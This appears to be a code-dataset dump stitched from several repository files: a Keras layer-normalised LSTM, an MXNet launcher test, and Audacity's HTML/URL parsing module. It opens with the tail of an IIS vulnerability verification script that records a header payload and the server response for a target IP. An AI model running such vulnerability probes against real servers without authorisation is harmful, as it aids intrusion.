result['VerifyInfo']['type']='iis Vulnerability'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload'] = vuln_header
result['VerifyInfo']['result'] =r.content
except Exception,e:
print e
finally:
if r is not None:
r.close()
del r
return result
if __name__ == '__main__':
print P().verify(ip='192.168.127.12',port='443')
|
rhn/lstm_ln.py
|
Neovairis/deep-models
| 155 |
79146
|
from keras import backend as K
from keras.layers import LSTM, time_distributed_dense
from keras import initializations, activations, regularizers
from keras.engine import InputSpec
# LSTM with Layer Normalization as described in:
# https://arxiv.org/pdf/1607.06450v1.pdf
# page 13, equation (20), (21), and (22)
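# Summary of the normalization implemented by norm() below (epsilon placement
# follows this implementation rather than the paper):
#   LN(x) = g * (x - mean(x)) / (sqrt(var(x) + 1e-3) + 1e-3) + b
# It is applied to the input-to-hidden projection, the hidden-to-hidden
# projection, and to the cell state before the output gate multiplication.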
class LSTM_LN(LSTM):
def __init__(self, output_dim, **kwargs):
super(LSTM_LN, self).__init__(output_dim, **kwargs)
def norm(self, xs, norm_id):
mu = K.mean(xs, axis=-1, keepdims=True)
sigma = K.sqrt(K.var(xs, axis=-1, keepdims=True) + 1e-3)
xs = self.gs[norm_id] * (xs - mu) / (sigma + 1e-3) + self.bs[norm_id]
return xs
def build(self, input_shape):
super(LSTM_LN, self).build(input_shape)
self.gs, self.bs = [], []
for i in xrange(3):
f = 1 if i == 2 else 4
self.gs += [ K.ones((f*self.output_dim,), name='{}_g{}'.format(self.name, i)) ]
self.bs += [ K.zeros((f*self.output_dim,), name='{}_b{}'.format(self.name, i)) ]
self.trainable_weights += self.gs + self.bs
def step(self, x, states):
h_tm1 = states[0]
c_tm1 = states[1]
B_U = states[2]
B_W = states[3]
if self.consume_less == 'gpu':
z = self.norm(K.dot(x * B_W[0], self.W), 0) + self.norm(K.dot(h_tm1 * B_U[0], self.U), 1) + self.b
z0 = z[:, :self.output_dim]
z1 = z[:, self.output_dim: 2 * self.output_dim]
z2 = z[:, 2 * self.output_dim: 3 * self.output_dim]
z3 = z[:, 3 * self.output_dim:]
i = self.inner_activation(z0)
f = self.inner_activation(z1)
c = f * c_tm1 + i * self.activation(z2)
o = self.inner_activation(z3)
else:
assert (False)
if self.consume_less == 'cpu':
x_i = x[:, :self.output_dim]
x_f = x[:, self.output_dim: 2 * self.output_dim]
x_c = x[:, 2 * self.output_dim: 3 * self.output_dim]
x_o = x[:, 3 * self.output_dim:]
elif self.consume_less == 'mem':
x_i = K.dot(x * B_W[0], self.W_i) + self.b_i
x_f = K.dot(x * B_W[1], self.W_f) + self.b_f
x_c = K.dot(x * B_W[2], self.W_c) + self.b_c
x_o = K.dot(x * B_W[3], self.W_o) + self.b_o
else:
raise Exception('Unknown `consume_less` mode.')
i = self.inner_activation(x_i + K.dot(h_tm1 * B_U[0], self.U_i))
f = self.inner_activation(x_f + K.dot(h_tm1 * B_U[1], self.U_f))
c = f * c_tm1 + i * self.activation(x_c + K.dot(h_tm1 * B_U[2], self.U_c))
o = self.inner_activation(x_o + K.dot(h_tm1 * B_U[3], self.U_o))
h = o * self.activation(self.norm(c, 2))
return h, [h, c]
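# --- Illustrative usage sketch (not part of the original file) ---
# Assumes the Keras 1.x API this layer targets; the model below is made up for
# the example. Note that step() only implements the consume_less='gpu' path.
#   import numpy as np
#   from keras.models import Sequential
#   from keras.layers import Dense
#   model = Sequential()
#   model.add(LSTM_LN(64, consume_less='gpu', input_shape=(20, 10)))
#   model.add(Dense(1))
#   model.compile(optimizer='adam', loss='mse')
#   model.predict(np.zeros((2, 20, 10)))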
|
tools/accuracy_checker/tests/test_mxnet_launcher.py
|
APrigarina/open_model_zoo
| 1,031 |
79149
|
<gh_stars>1000+
"""
Copyright (c) 2018-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
pytest.importorskip('mxnet')
import cv2
import numpy as np
from accuracy_checker.launcher.launcher import create_launcher
from accuracy_checker.config import ConfigError
from accuracy_checker.data_readers import DataRepresentation
def get_mx_test_model(models_dir, config_override=None):
config = {
"framework": 'mxnet',
"model": models_dir / 'samplenet-0000.params',
"adapter": 'classification',
"device": 'cpu',
'inputs': [{'name': 'data', 'type': 'INPUT', 'shape': '3,32,32'}]
}
if config_override:
config.update(config_override)
return create_launcher(config)
class TestMxNetLauncher:
def test_launcher_creates(self, models_dir):
launcher = get_mx_test_model(models_dir)
assert launcher.inputs['data'] == (1, 3, 32, 32)
assert launcher.output_blob == 'fc3'
def test_infer(self, data_dir, models_dir):
mx_test_model = get_mx_test_model(models_dir)
_, _, h, w = mx_test_model.inputs['data']
img_raw = cv2.imread(str(data_dir / '1.jpg'))
img_rgb = cv2.cvtColor(img_raw, cv2.COLOR_BGR2RGB)
img_resized = cv2.resize(img_rgb, (w, h))
input_blob = np.transpose([img_resized], (0, 3, 1, 2))
res = mx_test_model.predict([{'data': input_blob.astype(np.float32)}], [{}])
assert np.argmax(res[0]['fc3']) == 7
def test_mxnet_launcher_provide_input_shape_to_adapter(self, mocker, models_dir):
mocker.patch('mxnet.mod.Module.forward', return_value={'fc3': 0})
launcher = get_mx_test_model(models_dir)
zeros = DataRepresentation(np.zeros((1, 3, 32, 32)))
launcher.predict([{'data': zeros.data}], [zeros.metadata])
assert zeros.metadata['input_shape'] == {'data': (1, 3, 32, 32)}
def test_mxnet_launcher_auto_model_search(self, models_dir):
launcher = get_mx_test_model(models_dir, {'model': models_dir})
assert launcher.model == models_dir / 'samplenet-0000.params'
@pytest.mark.usefixtures('mock_path_exists')
class TestMxNetLauncherConfig:
def test_missed_model_in_create_mxnet_launcher_raises_config_error_exception(self):
config = {'framework': 'mxnet'}
with pytest.raises(ConfigError):
create_launcher(config)
def test_missed_inputs_in_create_mxnet_launcher_raises_config_error_exception(self):
config = {'framework': 'mxnet', 'model': 'model-0000.params'}
with pytest.raises(ConfigError):
create_launcher(config)
def test_missed_shape_in_inputs_in_create_mxnet_launcher_raises_config_error_exception(self):
config = {'framework': 'mxnet', 'model': 'model-0000.params', 'inputs': [{'name': 'data', 'type': 'INPUT'}]}
with pytest.raises(ConfigError):
create_launcher(config)
|
scripts/mw2html_audacity/htmldata.py
|
joshrose/audacity
| 7,892 |
79150
|
<filename>scripts/mw2html_audacity/htmldata.py
"""
Manipulate HTML or XHTML documents.
Version 1.1.1. This source code has been placed in the
public domain by <NAME>.
Features:
- Translate HTML back and forth to data structures.
This allows you to read and write HTML documents
programmably, with much flexibility.
- Extract and modify URLs in an HTML document.
- Compatible with Python 3+
See the L{examples} for a quick start.
Moved to Python3 by <NAME> May 2020
"""
__version__ = '1.1.2'
__all__ = ['examples', 'tagextract', 'tagjoin', 'urlextract',
'urljoin', 'URLMatch']
# -------------------------------------------------------------------
# Globals
# -------------------------------------------------------------------
import re
import shlex
import string
import urllib.request, urllib.parse, urllib.error
import urllib.parse
import types
# Translate text between these strings as plain text (not HTML).
_IGNORE_TAGS = [('script', '/script'),
('style', '/style')]
# Special tags where we have to look for _END_X as part of the
# HTML/XHTML parsing rules.
_BEGIN_COMMENT = '<!--'
_END_COMMENT = '-->'
_BEGIN_CDATA = '<![CDATA['
_END_CDATA = ']]>'
# Mime types that can be parsed as HTML or HTML-like.
_HTML_MIMETYPES = ['text/html', 'application/xhtml',
'application/xhtml+xml', 'text/xml',
'application/xml']
# Mime types that can be parsed as CSS.
_CSS_MIMETYPES = ['text/css']
# -------------------------------------------------------------------
# HTML <-> Data structure
# -------------------------------------------------------------------
def tagextract(doc):
"""
Convert HTML to data structure.
Returns a list. HTML tags become C{(name, keyword_dict)} tuples
within the list, while plain text becomes strings within the
list. All tag names are lowercased and stripped of whitespace.
Tags which end with forward slashes have a single forward slash
placed at the end of their name, to indicate that they are XML
unclosed tags.
Example:
>>> tagextract('<img src=hi.gif alt="hi">foo<br><br/></body>')
[('img', {'src': 'hi.gif', 'alt': 'hi'}), 'foo',
('br', {}), ('br/', {}), ('/body', {})]
Text inside C{'<script>'}...C{'</script>'} and C{'<style>'}...C{'</style>'}
blocks is rendered directly to plain text. This prevents rogue C{'<'} or
C{'>'} characters from interfering with parsing.
>>> tagextract('<script type="a"><blah>var x; </script>')
[('script', {'type': 'a'}), '<blah>var x; ', ('/script', {})]
Comment strings and XML directives are rendered as a single long
tag with no attributes. The case of the tag "name" is not changed:
>>> tagextract('<!-- blah -->')
[('!-- blah --', {})]
>>> tagextract('<?xml version="1.0" encoding="utf-8" ?>')
[('?xml version="1.0" encoding="utf-8" ?', {})]
>>> tagextract('<!DOCTYPE html PUBLIC etc...>')
[('!DOCTYPE html PUBLIC etc...', {})]
Greater-than and less-than characters occurring inside comments or
CDATA blocks are correctly kept as part of the block:
>>> tagextract('<!-- <><><><>>..> -->')
[('!-- <><><><>>..> --', {})]
>>> tagextract('<!CDATA[[><>><>]<> ]]>')
[('!CDATA[[><>><>]<> ]]', {})]
Note that if one modifies these tags, it is important to retain the
C{"--"} (for comments) or C{"]]"} (for C{CDATA}) at the end of the
tag name, so that output from L{tagjoin} will be correct HTML/XHTML.
"""
L = _full_tag_extract(doc)
for i in range(len(L)):
if isinstance(L[i], _TextTag):
# _TextTag object.
L[i] = L[i].text
else:
# _HTMLTag object.
L[i] = (L[i].name, L[i].attrs)
return L
def _is_str(s):
"""
True iff s is a string (checks via duck typing).
"""
return hasattr(s, 'capitalize')
def tagjoin(L):
"""
Convert data structure back to HTML.
This reverses the L{tagextract} function.
More precisely, if an HTML string is turned into a data structure,
then back into HTML, the resulting string will be functionally
equivalent to the original HTML.
>>> tagjoin(tagextract(s))
(string that is functionally equivalent to s)
Three changes are made to the HTML by L{tagjoin}: tags are
lowercased, C{key=value} pairs are sorted, and values are placed in
double-quotes.
"""
if _is_str(L):
raise ValueError('got string arg, expected non-string iterable')
ans = []
for item in L:
# Check for string using duck typing.
if _is_str(item):
# Handle plain text.
ans.append(item)
elif item[0] == '--':
# Handle closing comment.
ans.append('-->')
elif item[0] == '!--':
# Handle opening comment.
ans.append('<!--')
else:
# Handle regular HTML tag.
(name, d) = item
if name[-1:] == '/':
rslash = ' /'
name = name[:-1]
else:
rslash = ''
tag_items = []
items = list(d.items())
items.sort()
for (key, value) in items:
if value != None:
if '"' in value and "'" in value:
raise ValueError('attribute value contains both single' +
' and double quotes')
elif '"' in value:
tag_items.append(key + "='" + value + "'")
else:
tag_items.append(key + '="' + value + '"')
else:
tag_items.append(key)
tag_items = ' '.join(tag_items)
if tag_items != '':
tag_items = ' ' + tag_items
ans.append('<' + name + tag_items + rslash + '>')
return ''.join(ans)
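# Illustrative round trip (not from the original module), showing how a parsed
# attribute can be edited and re-serialized:
#   >>> parts = tagextract('<a href="x.html">link</a>')
#   >>> parts[0]
#   ('a', {'href': 'x.html'})
#   >>> parts[0][1]['href'] = 'y.html'
#   >>> tagjoin(parts)
#   '<a href="y.html">link</a>'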
def _enumerate(L):
"""
Like C{enumerate}, provided for compatibility with Python < 2.3.
Returns a list instead of an iterator.
"""
return list(zip(list(range(len(L))), L))
def _ignore_tag_index(s, i):
"""
Helper routine: Find index within C{_IGNORE_TAGS}, or C{-1}.
If C{s[i:]} begins with an opening tag from C{_IGNORE_TAGS}, return
the index. Otherwise, return C{-1}.
"""
for (j, (a, b)) in _enumerate(_IGNORE_TAGS):
if s[i:i + len(a) + 1].lower() == '<' + a:
return j
return - 1
def _html_split(s):
"""
Helper routine: Split string into a list of tags and non-tags.
>>> html_split(' blah <tag text> more </tag stuff> ')
[' blah ', '<tag text>', ' more ', '</tag stuff>', ' ']
Tags begin with C{'<'} and end with C{'>'}.
The identity C{''.join(L) == s} is always satisfied.
Exceptions to the normal parsing of HTML tags:
C{'<script>'}, C{'<style>'}, and HTML comment tags ignore all HTML
until the closing pair, and are added as three elements:
>>> html_split(' blah<style><<<><></style><!-- hi -->' +
... ' <script language="Javascript"></>a</script>end')
[' blah', '<style>', '<<<><>', '</style>', '<!--', ' hi ', '-->',
' ', '<script language="Javascript">', '</>a', '</script>', 'end']
"""
s_lower = s.lower()
L = []
i = 0 # Index of char being processed
while i < len(s):
c = s[i]
if c == '<':
# Left bracket, handle various cases.
if s[i:i + len(_BEGIN_COMMENT)].startswith(_BEGIN_COMMENT):
# HTML begin comment tag, '<!--'. Scan for '-->'.
i2 = s.find(_END_COMMENT, i)
if i2 < 0:
# No '-->'. Append the remaining malformed content and stop.
L.append(s[i:])
break
else:
# Append the comment.
L.append(s[i:i2 + len(_END_COMMENT)])
i = i2 + len(_END_COMMENT)
elif s[i:i + len(_BEGIN_CDATA)].startswith(_BEGIN_CDATA):
# XHTML begin CDATA tag. Scan for ']]>'.
i2 = s.find(_END_CDATA, i)
if i2 < 0:
# No ']]>'. Append the remaining malformed content and stop.
L.append(s[i:])
break
else:
# Append the CDATA.
L.append(s[i:i2 + len(_END_CDATA)])
i = i2 + len(_END_CDATA)
else:
# Regular HTML tag. Scan for '>'.
orig_i = i
found = False
in_quot1 = False
in_quot2 = False
for i2 in range(i + 1, len(s)):
c2 = s[i2]
if c2 == '"' and not in_quot1:
in_quot2 = not in_quot2
# Only turn on double quote if it's in a realistic place.
if in_quot2 and not in_quot1:
if i2 > 0 and s[i2 - 1] not in [' ', '\t', '=']:
in_quot2 = False
elif c2 == "'" and not in_quot2:
in_quot1 = not in_quot1
# Only turn on single quote if it's in a realistic place.
if in_quot1 and not in_quot2:
if i2 > 0 and s[i2 - 1] not in [' ', '\t', '=']:
in_quot1 = False
elif c2 == '>' and (not in_quot2 and not in_quot1):
found = True
break
if not found:
# No end '>'. Append the rest as text.
L.append(s[i:])
break
else:
# Append the tag.
L.append(s[i:i2 + 1])
i = i2 + 1
# Check whether we found a special ignore tag, eg '<script>'
tagi = _ignore_tag_index(s, orig_i)
if tagi >= 0:
# It's an ignore tag. Scan for the end tag.
i2 = s_lower.find('<' + _IGNORE_TAGS[tagi][1], i)
if i2 < 0:
# No end tag. Append the rest as text.
L.append(s[i:])
break
else:
# Append the text sandwiched between the tags.
L.append(s[i:i2])
# Catch the closing tag with the next loop iteration.
i = i2
else:
# Not a left bracket, append text up to next left bracket.
i2 = s.find('<', i)
if i2 < 0:
# No left brackets, append the rest as text.
L.append(s[i:])
break
else:
L.append(s[i:i2])
i = i2
return L
def _shlex_split(s):
"""
Like C{shlex.split}, but reversible, and for HTML.
Splits a string into a list C{L} of strings. List elements
contain either an HTML tag C{name=value} pair, an HTML name
singleton (eg C{"checked"}), or whitespace.
The identity C{''.join(L) == s} is always satisfied.
>>> _shlex_split('a=5 b="15" name="<NAME>"')
['a=5', ' ', 'b="15"', ' ', 'name="<NAME>"']
>>> _shlex_split('a = a5 b=#b19 name="foo bar" q="hi"')
['a = a5', ' ', 'b=#b19', ' ', 'name="foo bar"', ' ', 'q="hi"']
>>> _shlex_split('a="9"b="15"')
['a="9"', 'b="15"']
"""
ans = []
i = 0
while i < len(s):
c = s[i]
if c in string.whitespace:
# Whitespace. Add whitespace while found.
for i2 in range(i, len(s)):
if s[i2] not in string.whitespace:
break
# Include the entire string if the last char is whitespace.
if s[i2] in string.whitespace:
i2 += 1
ans.append(s[i:i2])
i = i2
else:
# Match 'name = "value"'
c = re.compile(r'[^ \t\n\r\f\v"\']+\s*\=\s*"[^"]*"')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Match "name = 'value'"
c = re.compile(r'[^ \t\n\r\f\v"\']+\s*\=\s*\'[^\']*\'')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Match 'name = value'
c = re.compile(r'[^ \t\n\r\f\v"\']+\s*\=\s*[^ \t\n\r\f\v"\']*')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Match 'name'
c = re.compile(r'[^ \t\n\r\f\v"\']+')
m = c.match(s, i)
if m:
ans.append(s[i:m.end()])
i = m.end()
continue
# Couldn't match anything so far, so it's likely that the page
# has malformed quotes inside a tag. Add leading quotes
# and spaces to the previous field until we see something.
subadd = []
while i < len(s) and s[i] in ['"', "'", ' ', '\t']:
subadd.append(s[i])
i += 1
# Add whatever we could salvage from the situation and move on.
if len(subadd) > 0:
ans.append(''.join(subadd))
else:
# We totally failed at matching this character, so add it
# as a separate item and move on.
ans.append(s[i])
return ans
def _test_shlex_split():
"""
Unit test for L{_shlex_split}.
"""
assert _shlex_split('') == []
assert _shlex_split(' ') == [' ']
assert _shlex_split('a=5 b="15" name="<NAME>"') == \
['a=5', ' ', 'b="15"', ' ', 'name="<NAME>"']
assert _shlex_split('a=cvn b=32vsd c= 234jk\te d \t="hi"') == \
['a=cvn', ' ', 'b=32vsd', ' ', 'c= 234jk', '\t', 'e', ' ',
'd \t="hi"']
assert _shlex_split(' a b c d=e f g h i="jk" l mno = p ' + \
'qr = "st"') == \
[' ', 'a', ' ', 'b', ' ', 'c', ' ', 'd=e', ' ', 'f', ' ', \
'g', ' ', 'h', ' ', 'i="jk"', ' ', 'l', ' ', 'mno = p', \
' ', 'qr = "st"']
assert _shlex_split('a=5 b="9"c="15 dfkdfkj "d="25"') == \
['a=5', ' ', 'b="9"', 'c="15 dfkdfkj "', 'd="25"']
assert _shlex_split('a=5 b="9"c="15 dfkdfkj "d="25" e=4') == \
['a=5', ' ', 'b="9"', 'c="15 dfkdfkj "', 'd="25"', ' ', \
'e=4']
assert _shlex_split('a=5 b=\'9\'c=\'15 dfkdfkj \'d=\'25\' e=4') == \
['a=5', ' ', 'b=\'9\'', 'c=\'15 dfkdfkj \'', 'd=\'25\'', \
' ', 'e=4']
def _tag_dict(s):
"""
Helper routine: Extracts a dict from an HTML tag string.
>>> _tag_dict('bgcolor=#ffffff text="#000000" blink')
({'bgcolor':'#ffffff', 'text':'#000000', 'blink': None},
{'bgcolor':(0,7), 'text':(16,20), 'blink':(31,36)},
{'bgcolor':(8,15), 'text':(22,29), 'blink':(36,36)})
Returns a 3-tuple. First element is a dict of
C{(key, value)} pairs from the HTML tag. Second element
is a dict mapping keys to C{(start, end)} indices of the
key in the text. Third element maps keys to C{(start, end)}
indices of the value in the text.
Names are lowercased.
Raises C{ValueError} for unmatched quotes and other errors.
"""
d = _shlex_split(s)
attrs = {}
key_pos = {}
value_pos = {}
start = 0
for item in d:
end = start + len(item)
equals = item.find('=')
if equals >= 0:
# Contains an equals sign.
(k1, k2) = (start, start + equals)
(v1, v2) = (start + equals + 1, start + len(item))
# Strip spaces.
while k1 < k2 and s[k1] in string.whitespace: k1 += 1
while k1 < k2 and s[k2 - 1] in string.whitespace: k2 -= 1
while v1 < v2 and s[v1] in string.whitespace: v1 += 1
while v1 < v2 and s[v2 - 1] in string.whitespace: v2 -= 1
# Strip one pair of double quotes around value.
if v1 < v2 - 1 and s[v1] == '"' and s[v2 - 1] == '"':
v1 += 1
v2 -= 1
# Strip one pair of single quotes around value.
if v1 < v2 - 1 and s[v1] == "'" and s[v2 - 1] == "'":
v1 += 1
v2 -= 1
(key, value) = (s[k1:k2].lower(), s[v1:v2])
# Drop bad keys and values.
if '"' in key or "'" in key:
continue
if '"' in value and "'" in value:
continue
attrs[key] = value
key_pos[key] = (k1, k2)
value_pos[key] = (v1, v2)
elif item.split() == []:
# Whitespace. Ignore it.
pass
else:
# A single token, like 'blink'.
key = item.lower()
# Drop bad keys.
if '"' in key or "'" in key:
continue
attrs[key] = None
key_pos[key] = (start, end)
value_pos[key] = (end, end)
start = end
return (attrs, key_pos, value_pos)
def _test_tag_dict():
"""
Unit test for L{_tag_dict}.
"""
assert _tag_dict('') == ({}, {}, {})
assert _tag_dict(' \t\r \n\n \r\n ') == ({}, {}, {})
assert _tag_dict('bgcolor=#ffffff text="#000000" blink') == \
({'bgcolor':'#ffffff', 'text':'#000000', 'blink': None},
{'bgcolor':(0, 7), 'text':(16, 20), 'blink':(31, 36)},
{'bgcolor':(8, 15), 'text':(22, 29), 'blink':(36, 36)})
assert _tag_dict("bgcolor='#ffffff'text='#000000' blink") == \
({'bgcolor':'#ffffff', 'text':'#000000', 'blink': None},
{'bgcolor':(0, 7), 'text':(17, 21), 'blink':(32, 37)},
{'bgcolor':(9, 16), 'text':(23, 30), 'blink':(37, 37)})
s = ' \r\nbg = val text \t= "hi you" name\t e="5"\t\t\t\n'
(a, b, c) = _tag_dict(s)
assert a == {'text': 'hi you', 'bg': 'val', 'e': '5', 'name': None}
for key in list(a.keys()):
assert s[b[key][0]:b[key][1]] == key
if a[key] != None:
assert s[c[key][0]:c[key][1]] == a[key]
def _full_tag_extract(s):
"""
Like L{tagextract}, but different return format.
Returns a list of L{_HTMLTag} and L{_TextTag} instances.
The return format is very inconvenient for manipulating HTML, and
only will be useful if you want to find the exact locations where
tags occur in the original HTML document.
"""
L = _html_split(s)
# Starting position of each L[i] in s.
Lstart = [0] * len(L)
for i in range(1, len(L)):
Lstart[i] = Lstart[i - 1] + len(L[i - 1])
class NotTagError(Exception): pass
for (i, text) in _enumerate(L):
try:
# Is it an HTML tag?
is_tag = False
if len(text) >= 2 and text[0] == '<' and text[-1] == '>':
# Turn HTML tag text into (name, keyword_dict) tuple.
is_tag = True
is_special = False
if len(text) >= 2 and (text[1] == '!' or text[1] == '?'):
is_special = True
if is_special:
# A special tag such as XML directive or <!-- comment -->
pos = (Lstart[i], Lstart[i] + len(L[i]))
# Wrap inside an _HTMLTag object.
L[i] = _HTMLTag(pos, text[1:-1].strip(), {}, {}, {})
elif is_tag:
# If an HTML tag, strip brackets and handle what's left.
# Strip off '<>' and update offset.
orig_offset = 0
if len(text) >= 1 and text[0] == '<':
text = text[1:]
orig_offset = 1
if len(text) >= 1 and text[-1] == '>':
text = text[:-1]
if len(text) > 0 and text[-1] == '/':
rslash = True
text = text[:-1]
else:
rslash = False
m = re.search(r'\s', text)
first_space = -1
if m:
first_space = m.start()
if first_space < 0:
(name, dtext) = (text, '')
else:
name = text[:first_space]
dtext = text[first_space + 1:len(text)]
# Position of dtext relative to original text.
dtext_offset = len(name) + 1 + orig_offset # +1 for space.
# Lowercase everything except XML directives and comments.
if not name.startswith('!') and not name.startswith('?'):
name = name.strip().lower()
if rslash:
name += '/'
# Strip off spaces, and update dtext_offset as appropriate.
orig_dtext = dtext
dtext = dtext.strip()
dtext_offset += orig_dtext.index(dtext)
(attrs, key_pos, value_pos) = _tag_dict(dtext)
# Correct offsets in key_pos and value_pos.
for key in list(attrs.keys()):
key_pos[key] = (key_pos[key][0] + Lstart[i] + dtext_offset,
key_pos[key][1] + Lstart[i] + dtext_offset)
value_pos[key] = (value_pos[key][0] + Lstart[i] + dtext_offset,
value_pos[key][1] + Lstart[i] + dtext_offset)
pos = (Lstart[i], Lstart[i] + len(L[i]))
# Wrap inside an _HTMLTag object.
L[i] = _HTMLTag(pos, name, attrs, key_pos, value_pos)
else:
# Not an HTML tag.
raise NotTagError
except NotTagError:
# Wrap non-HTML strings inside a _TextTag object.
pos = (Lstart[i], Lstart[i] + len(L[i]))
L[i] = _TextTag(pos, L[i])
return L
class _HTMLTag:
"""
HTML tag extracted by L{_full_tag_extract}.
@ivar pos: C{(start, end)} indices of the entire tag in the
HTML document.
@ivar name: Name of tag. For example, C{'img'}.
@ivar attrs: Dictionary mapping tag attributes to corresponding
tag values.
Example:
>>> tag = _full_tag_extract('<a href="d.com">')[0]
>>> tag.attrs
{'href': 'd.com'}
Surrounding quotes are stripped from the values.
@ivar key_pos: Key position dict.
Maps the name of a tag attribute to C{(start, end)}
indices for the key string in the C{"key=value"}
HTML pair. Indices are absolute, where 0 is the
start of the HTML document.
Example:
>>> tag = _full_tag_extract('<a href="d.com">')[0]
>>> tag.key_pos['href']
(3, 7)
>>> '<a href="d.com">'[3:7]
'href'
@ivar value_pos: Value position dict.
Maps the name of a tag attribute to C{(start, end)}
indices for the value in the HTML document string.
Surrounding quotes are excluded from this range.
Indices are absolute, where 0 is the start of the
HTML document.
Example:
>>> tag = _full_tag_extract('<a href="d.com">')[0]
>>> tag.value_pos['href']
(9, 14)
>>> '<a href="d.com">'[9:14]
'd.com'
"""
def __init__(self, pos, name, attrs, key_pos, value_pos):
"""
Create an _HTMLTag object.
"""
self.pos = pos
self.name = name
self.attrs = attrs
self.key_pos = key_pos
self.value_pos = value_pos
class _TextTag:
"""
Text extracted from an HTML document by L{_full_tag_extract}.
@ivar text: Extracted text.
@ivar pos: C{(start, end)} indices of the text.
"""
def __init__(self, pos, text):
"""
Create a _TextTag object.
"""
self.pos = pos
self.text = text
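def _example_full_tag_extract():
    """
    Illustrative sketch (not part of the original module): the objects
    returned by L{_full_tag_extract} carry absolute positions that index
    straight back into the source document.
    """
    s = '<a href="d.com">x'
    (tag, text) = _full_tag_extract(s)
    assert s[tag.pos[0]:tag.pos[1]] == '<a href="d.com">'
    assert s[tag.key_pos['href'][0]:tag.key_pos['href'][1]] == 'href'
    assert s[tag.value_pos['href'][0]:tag.value_pos['href'][1]] == 'd.com'
    assert text.text == 'x'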
# -------------------------------------------------------------------
# URL Editing
# -------------------------------------------------------------------
# Tags within which URLs may be found.
_URL_TAGS = ['a href', 'applet archive', 'applet code',
'applet codebase', 'area href', 'base href',
'blockquote cite', 'body background', 'del cite',
'form action', 'frame longdesc', 'frame src',
'head profile', 'iframe src', 'iframe longdesc',
'img src', 'img ismap', 'img longdesc', 'img usemap',
'input src', 'ins cite', 'link href', 'object archive',
'object codebase', 'object data', 'object usemap',
'script src', 'table background', 'tbody background',
'td background', 'tfoot background', 'th background',
'thead background', 'tr background']
_URL_TAGS = [tuple(s.split()) for s in _URL_TAGS]
def _finditer(pattern, string):
"""
Like C{re.finditer}, provided for compatibility with Python < 2.3.
Returns a list instead of an iterator. Otherwise the return format
is identical to C{re.finditer} (except possibly in the details of
empty matches).
"""
compiled = re.compile(pattern)
ans = []
start = 0
while True:
m = compiled.search(string, start)
if m:
ans.append(m)
else:
return ans
m_start = m.start(m.lastindex)
m_end = m.end(m.lastindex)
if m_end > m_start:
start = m_end
else:
start += 1
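def _example_finditer():
    """
    Illustrative sketch (not part of the original module): for simple
    single-group patterns, L{_finditer} behaves like C{re.finditer}.
    """
    matches = _finditer(r'(\d+)', 'a1 b22 c333')
    assert [m.group(1) for m in matches] == ['1', '22', '333']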
def _remove_comments(doc):
"""
Replaces commented out characters with spaces in a CSS document.
"""
ans = []
i = 0
while True:
i2 = doc.find('/*', i)
if i2 < 0:
ans += [doc[i:]]
break
ans += [doc[i:i2]]
i3 = doc.find('*/', i2 + 1)
if i3 < 0:
i3 = len(doc) - 2
ans += [' ' * (i3 - i2 + 2)]
i = i3 + 2
return ''.join(ans)
def _test_remove_comments():
"""
Unit test for L{_remove_comments}.
"""
s = '/*d s kjlsdf */*//*/*//**/**/*//**/a' * 50
assert len(_remove_comments(s)) == len(s)
s = '/**/' * 50 + '/*5845*/*/*//*/**/dfd' + '/*//**//'
assert len(_remove_comments(s)) == len(s)
s = 'a/**/' * 50 + '/**//**/////***/****/*//**//*/' * 5
assert len(_remove_comments(s)) == len(s)
s = 'hi /* foo */ hello /* bar!!!!! \n\n */ there!'
assert _remove_comments(s) == \
'hi hello there!'
def urlextract(doc, siteurl=None, mimetype='text/html'):
"""
Extract URLs from HTML or stylesheet.
Extracts only URLs that are linked to or embedded in the document.
Ignores plain text URLs that occur in the non-HTML part of the
document.
Returns a list of L{URLMatch} objects.
>>> L = urlextract('<img src="a.gif"><a href="www.google.com">')
>>> L[0].url
'a.gif'
>>> L[1].url
'www.google.com'
If C{siteurl} is specified, all URLs are made into absolute URLs
by assuming that C{doc} is located at the URL C{siteurl}.
>>> doc = '<img src="a.gif"><a href="/b.html">'
>>> L = urlextract(doc, 'http://www.python.org/~guido/')
>>> L[0].url
'http://www.python.org/~guido/a.gif'
>>> L[1].url
'http://www.python.org/b.html'
If C{mimetype} is C{"text/css"}, the document will be parsed
as a stylesheet.
If a stylesheet is embedded inside an HTML document, then
C{urlextract} will extract the URLs from both the HTML and the
stylesheet.
"""
mimetype = mimetype.lower()
if mimetype.split()[0] in _CSS_MIMETYPES:
doc = _remove_comments(doc)
# Match URLs within CSS stylesheet.
# Match url(blah) or url('blah') or url("blah").
L = _finditer(
r'''url\s*\(([^\r\n\("']*?)\)|''' +
r'''url\s*\(\s*"([^\r\n]*?)"\s*\)|''' +
r'''url\s*\(\s*'([^\r\n]*?)'\s*\)|''' +
r'''@import\s+([^ \t\r\n"';@\(\)]+)[^\r\n;@\(\)]*[\r\n;]|''' +
r'''@import\s+'([^ \t\r\n"';@\(\)]+)'[^\r\n;@\(\)]*[\r\n;]|''' +
r'''@import\s+"([^ \t\r\n"';\(\)']+)"[^\r\n;@\(\)]*[\r\n;]''',
doc + ';\n')
L = [(x.start(x.lastindex), x.end(x.lastindex)) for x in L]
ans = []
for (s, e) in L:
e = min(e, len(doc))
if e > s:
ans.append(URLMatch(doc, s, e, siteurl, False, True))
elif mimetype.split()[0] in _HTML_MIMETYPES:
# Match URLs within HTML document.
ans = []
L = _full_tag_extract(doc)
item = None
for i in range(len(L)):
prev_item = item
item = L[i]
# Handle string item (text) or tuple item (tag).
if isinstance(item, _TextTag):
# Current item is text.
if isinstance(prev_item, _HTMLTag) and prev_item.name == \
'style':
# And previous item is <style>. Process a stylesheet.
temp = urlextract(item.text, siteurl, 'text/css')
# Offset indices and add to ans.
for j in range(len(temp)):
temp[j].start += item.pos[0]
temp[j].end += item.pos[0]
ans += temp
else:
# Regular text. Ignore.
pass
else:
# Current item is a tag.
if 'style' in item.attrs:
# Process a stylesheet embedded in the 'style' attribute.
